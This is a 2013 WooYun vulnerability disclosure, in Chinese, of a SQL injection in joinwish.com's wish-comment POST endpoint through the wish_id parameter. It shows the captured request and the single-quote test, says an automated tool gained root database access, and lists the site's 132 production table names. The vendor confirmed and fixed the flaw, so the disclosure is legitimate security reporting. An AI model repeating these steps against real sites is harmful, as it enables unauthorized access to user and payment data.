当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034608

漏洞标题:好愿网主站post注入漏洞一枚

相关厂商:joinwish.com

漏洞作者: 带馅儿馒头

提交时间:2013-08-19 18:14

修复时间:2013-10-03 18:15

公开时间:2013-10-03 18:15

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-19: 细节已通知厂商并且等待厂商处理中
2013-08-20: 厂商已经确认,细节仅向厂商公开
2013-08-30: 细节向核心白帽子及相关领域专家公开
2013-09-09: 细节向普通白帽子公开
2013-09-19: 细节向实习白帽子公开
2013-10-03: 细节向公众公开

简要描述:

看见你们发礼物了,来求个礼物!

详细说明:

1.登录后对某个用户的愿望点击祝福;

5.png


2.填写任意祝福内容,点击提交并抓包;

1.png


3.此时抓包会抓到2个post请求数据,第一个忽略掉,我们来看第二个抓到的请求数据;

POST /wishservice/add_wish_msg HTTP/1.1
Host: www.joinwish.com
User-Agent:
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.joinwish.com/wish/show/id/1432
Content-Length: 24
Cookie:
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
wish_id=1432&content=123


4.这里发现在wish_id参数后加上一个',系统返回了数据库的错误信息,当然还有网站的绝对路径信息,但是这些信息我们在网页上是还不见的;

6.png


5.直接使用工具跑下,得到如下信息;
root权限:

3.png


数据库信息:

4.png


表信息:

Database: joinwish_product
[132 tables]
+------------------------------+
| account_freeze_tx |
| account_topups |
| account_transfers |
| account_tx |
| account_withdraws |
| accounts |
| alipay_transfer |
| alipay_transfer_batch |
| areas |
| auth_group |
| auth_group_permissions |
| auth_permission |
| auth_user |
| auth_user_groups |
| auth_user_user_permissions |
| backend_tx |
| backends |
| bank_cities |
| bank_provinces |
| barcode_types |
| biz_card_bindings |
| brands |
| c2c_topup_requests |
| card_items |
| cities |
| cs_logs |
| cs_roles |
| cs_user_functions |
| cs_user_role_functions |
| cs_user_roles |
| cs_users |
| django_admin_log |
| django_content_type |
| django_session |
| django_site |
| errors |
| exchanges_users |
| favorite_wishes |
| gateway_audit |
| gateway_audit_result |
| gateway_order |
| give_user_brand |
| hulu_card_no_libs |
| invitees |
| merchants |
| mptopup_orders |
| offline_transfers |
| p2p_catalogs |
| p2p_comment |
| p2p_commodities |
| p2p_exchange_0 |
| p2p_exchange_1 |
| p2p_merchant |
| p2p_order |
| p2p_send_transaction |
| p2p_send_withdraw |
| p2p_settlement_payment_batch |
| p2p_ticket |
| p2p_ticket_batch |
| payment_card_logs |
| payment_channels |
| payment_orders |
| properties |
| provinces |
| public_utility_orders |
| refunded_transactions |
| settlement |
| settlement_detail |
| shopping_items |
| shopping_orders |
| terminal_requests |
| transaction_details |
| transactions |
| tx_types |
| user_addresses |
| user_backends |
| user_friends |
| user_mp_verify_codes |
| user_reg_requests |
| user_saved_cards |
| user_sessions |
| user_uploaded_pic_catalogs |
| user_uploaded_pics |
| user_wish_statistics |
| users |
| weibo_template |
| wish_albums |
| wish_amount_increase_logs |
| wish_award_logs |
| wish_base |
| wish_cash_coupons |
| wish_comments |
| wish_commodities |
| wish_cs_roles |
| wish_cs_user_functions |
| wish_cs_user_role_functions |
| wish_cs_user_roles |
| wish_cs_users |
| wish_details |
| wish_exchange_items |
| wish_exchange_tocheck_users |
| wish_exchange_view |
| wish_exchanges |
| wish_fans |
| wish_gifts |
| wish_give_logs |
| wish_give_tx |
| wish_guest_infos |
| wish_hp_use_logs |
| wish_join_requests |
| wish_members |
| wish_mer_exchange |
| wish_merchants |
| wish_msgs |
| wish_pdts |
| wish_praise_statistical |
| wish_prop_logs |
| wish_pub_logs |
| wish_solutions |
| wish_themes |
| wish_transfers |
| wish_user_banding |
| wish_user_guides |
| wish_user_notification |
| wish_user_verification |
| wish_users |
| wish_visit_logs |
| wishes |
| withdraw_fee_rate |
| ym_sms |
| ym_sms_mo |
| ym_sms_mt |
+------------------------------+


5.测试到这里就差不多了,求礼物!!!

漏洞证明:

见详细说明

修复方案:

过滤

版权声明:转载请注明来源 带馅儿馒头@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-20 10:13

厂商回复:

该漏洞已与昨日修复

最新状态:

暂无